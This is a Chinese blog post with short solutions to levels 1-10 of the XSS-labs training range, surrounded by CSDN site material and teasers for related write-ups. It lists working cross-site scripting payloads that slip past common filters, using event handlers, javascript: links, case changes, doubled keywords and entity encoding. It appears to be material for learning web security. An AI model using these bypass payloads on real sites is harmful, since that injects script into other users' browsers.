XSS-labs (1-10)

最新推荐文章于 2024-07-20 15:57:52 发布
最新推荐文章于 2024-07-20 15:57:52 发布
阅读量2.1k 收藏
点赞数
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54431413/article/details/123843915
版权

一、反射型(get)

<script>alert(1)</script>

二、闭合value和input标签

"><script>alert(1)</script>

(2F在url中就是/)

三、htmlspecialchars() 函数

htmlspecialchars() 函数把一些预定义的字符转换为 HTML 实体。

把 < 和 > 转换为实体常用于防止浏览器将其用作 HTML 元素。当用户有权在您的页面上显示输入时,对于防止代码运行非常有用。

预定义的字符是:

  • & (和号) 成为 &amp;
  • " (双引号) 成为 &quot;
  • ' (单引号) 成为 &#039;(默认不对单引号进行转换)
  • < (小于) 成为 &lt;
  • > (大于) 成为 &gt;

避过这些符号即可

' οnclick='javascript:alert(2)

四、过滤 <>,没有用htmlspecialchars()

" οnclick="javascript:alert(2)

五、过滤<script 和on

 

用<a>标签绕过

"><a href="javascript:alert(alert(123));">xss</a>

六、大小写绕过

没有大小写转换函数

" Onclick="javascript:alert(2)

七、双写绕过

敏感字符串替换为空,没有循环或正则

"><scscriptript>alert(1)</scscriptript>

八、编码绕过

在href中可以直接执行js

javasc&#82;ipt:alert(1);

九、通过 http://来检测是否是链接

可以写到后边绕过检测,并且//注释掉

javasc&#82;ipt:alert(1);//http://

十、type=hidden

构造payload更改type类型

1&t_sort=" οnclick=alert('123') type="text" >

梅_花_七
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
xss-labs通关详解 Level 6-10
qq_41755084的博客
10-25 963
这一关整体上与第五关类似,只是黑名单的量增加了,尝试了href、src等字段,都被替换掉了。不过这个黑名单是大小写敏感的,而在html语句中,大小写不敏感。我们可以使用大小写字段进行绕过。构造注入代码从keyword参数处传入。将href的f大写,变为hreF,绕过黑名单,页面上成功插入了标签。点击该标签,成功弹窗。
XSSxss-labs-level10
Hugu
02-23 349
文章目录0x01 XSS-Labs0x02 实验工具0x03 实验环境0x04 实验步骤0x05 实验分析0x06 参考链接 0x01 XSS-Labs   XSS(跨站脚本攻击)是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。   XSS按照利用方式主要分为:反射型XSS、存储型XSS、DOM型XSS。反射型XSS是攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的
xss-labs 1-10
2202_75785935的博客
06-11 90
strpos()函数用于在字符串内查找一个字符或一段指定的文本,如果在字符串中找到匹配,该函数会返回第一个匹配的字符位置,如果未找到匹配,则返回FALSE。添加友情链接处是突破点,在输入字符提交后,友情链接处会载入一个拼接后的a标签,因为javascript被过滤,所以进行编码绕过再点击友情链接。所以:<input name=keyword value=''onmouseover='alert(/xss/)'>从页面回显来看,将name参数的值显示在了页面上,并且显示了name参数值的字符长度。
xss-labs靶场训练(10-13关)
ldzhhh的博客
05-23 936
第十关 先用<script>alert(xss)</script>试试 这里发现一个隐藏的form表单,里面有3个隐藏的变量:t_link、t_history、t_sort。 把三个参数都传进去试试看: http://192.168.121.129/xss/level10.php?keyword=well done!&t_link=1&t_history=2&t_sort=3 发现t_sort可以传入参数,构造Payload: t_sort=<sc
xss-labs level 1-10 攻略
borrrrring的博客
02-02 634
level 1 我们可以看到在payload中可以看到参数name,值为text,字符的长度为4,参数name的返回值会出现在界面上。 查看源代码 我们可以看到,参数name插入到了标签中,可以得出这是反射型XSS漏洞。 什么是反射型XSS?简单来说,就是当用户在网站的地址栏输入URL,从服务端获取到数据时,网站页面会根据返回的信息而呈现不同的返回页面,如果这个时候恶意用户在页面中输入的数据不经过验证且不经过超文本标记语言的编码就录入到脚本中,就会产生漏洞。 而且在源代码中我们还可以看到有一个关于窗口的语句
xss-labs-master.rar
05-09
"xss-labs-master.rar" 提供了一个针对XSS漏洞的专项练习平台,旨在帮助初学者及安全爱好者提升对XSS攻击的理解和防御能力。这个靶机资源共分为二十个关卡,由浅入深,逐步引导用户掌握XSS攻防的核心技巧。 一、XSS...
xss-labs-master源码
07-06
"xss-labs-master"是一个专门设计的靶场,包含了20个级别的XSS练习,旨在帮助学习者深入理解和掌握XSS攻击的原理、类型以及防御策略。通过逐步解决这些精心设计的挑战,我们可以逐步提升对XSS攻击的理解,并提升安全...
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通关游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...
xss-labs.zip
03-18
这个“xss-labs.zip”文件显然是一个专门为学习和理解XSS漏洞而设计的实践平台,包含了20个具有不同XSS特征的网页示例。通过这个实验室,你可以深入学习如何检测、防范以及利用XSS漏洞。 XSS攻击通常分为三种类型:...
xss-labs靶场一到十关
zxcvbnm123456x的博客
06-26 791
xss的靶场地址为:http://test.ctf8.com/需要先打开phpstudy才能进行练习。
Xss-labs 第 1 - 10 关 通过笔记
weixin_45619494的博客
10-24 1529
alert(1) 发现 h2 标签 和 input 标签 都被 html实体 编码了。href标签 变成了alert(1) //http://www.baidu.com">试试:">>alert(1)
XSS-labs(1-10)闯关详解
m0_46467017的博客
07-25 2783
通过查看可以知道本关与上一关的不同,在于转换后的内容不同,虽然添加了大小写转换,但是因为转换后,字符被转换为空字符,所以转换后的字符如何仍可以组合成,那么就可以绕过该防御机制。进入第八关后,发现无法构造闭合,采用是采用了htmlspecialchars($str)函数,而且闭合方式是双引号,所以input中无法注入,但是在连接里面是有地方可以注入的。右键查看源代码,发现我们输入的>,.........
XSS挑战赛(xsslabs)1~10关通关解析
黄乔国PHP
03-06 873
XSS挑战赛,里面包含了各种XSS的防御方式和绕过方式,好好掌握里面的绕过细节,有助于我们更好的去发现XSS漏洞以及XSS的防御。本文更多的是分享解析的细节,不是一个标准的答案,希望大家在渗透的时候有更多的思维。
跨站脚本漏洞
weixin_46729085的博客
09-08 3755
XSS漏洞 一、文章简介 XSS漏洞是Web应用程序中最常见的漏洞之一。如果您的站点没有预防XSS漏洞的固定方法,那么很可能就存在XSS漏洞。 这篇文章将带你通过代码层面去理解三个问题: 什么是XSS漏洞? XSS漏洞有哪些分类? 如何防范XSS漏洞? 二:三大分类 反射型XSS:<非持久化> 攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。 存储型XSS:&...
xss挑战1-10
weixin_45498459的博客
03-09 838
xss level1 代码 xsslevel1代码2第1中方法反射性第二种script标签level 3level4lelvel5scripta标签level6a链接">xss</alevle7lelve8level9level10 <!DOCTYPE html> <!--STATUS OK--><html> <head> <meta http-equiv="content-type" content="text/html...
xss-labs通关攻略教程(level1~level 10
m0_55854679的博客
07-23 4420
level 1 观察题目,发现用户名在url处被提交,且输出用户名的长度为4 2. 查看源码,发现参数未进行任何过滤,猜测为反射型xss 3. 修改name参数为<script>alert("xss")</script> level 2 观察页面提示,发现依然为反射型xss,但是与上一关不同之处在于有了搜索框。 尝试添加与上一关相同的参数 查看源码,发现<和>被HTML字符实体化为&lt、&gt,"被HTML字符实体化为&quot .
xss-labs 10到20关
h0ld1rs的博客
07-23 880
xss-labs 11--20关第11关第12关第13关第14关第15关第16关第17关第18关第19关第20关 第11关 在网页中查看源代码并没有获得有效信息 于是我选择查看php源代码 发现这一关多出来这个,但这个又被str_replace函数处理 而HTTP_REFERER是获取http请求头中的Referer字段, 就是我们上一级网页的url, 那么我们就需要使用到抓包工具进行抓包,修改Referer字段。 但是好几次,我抓包的时候都没有refer这个选项 最后找到的方法是,在第十关转换到第十
【网络安全科普】勒索病毒 防护指南
最新发布
a38417的博客
07-20 581
常规的杀毒软件查找病毒的原理一般是对当前计算机上的文件进行特征的检测,检测完成后和现有的病毒库中的特征数据进行匹配,如果可以匹配成功则找到病毒文件,因此现有的勒索病毒对我们常用的常规杀毒软件是一个很大的挑战。一旦勒索病毒感染了计算机,它会立即开始加密用户的文件,包括文档、图片、视频等,并在屏幕上显示要求用户支付赎金的消息。从操作系统来看被植入病毒的主要是Windows XP、Windows 7,原因是目前这些系统中有一部分微软官方已经不再支持更新、以及补丁的维护,一般会存在较多的无法及时修复的漏洞。
云计算监控减少网络安全事件的五种方法
QQ3007250950的博客
07-17 1035
没有充分保护自己的公司很容易受到网络攻击。如果他们使用云计算平台进行操作,这种风险就会增加。如果他们采取适当的安全措施来保护自己,那将是最好的。这些措施的一部分是实施云计算监控,这是一个允许网络安全专业人员主动检测云系统中的漏洞和可疑活动的过程。
xss-labs安装
07-28
chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [xss-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

梅_花_七

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值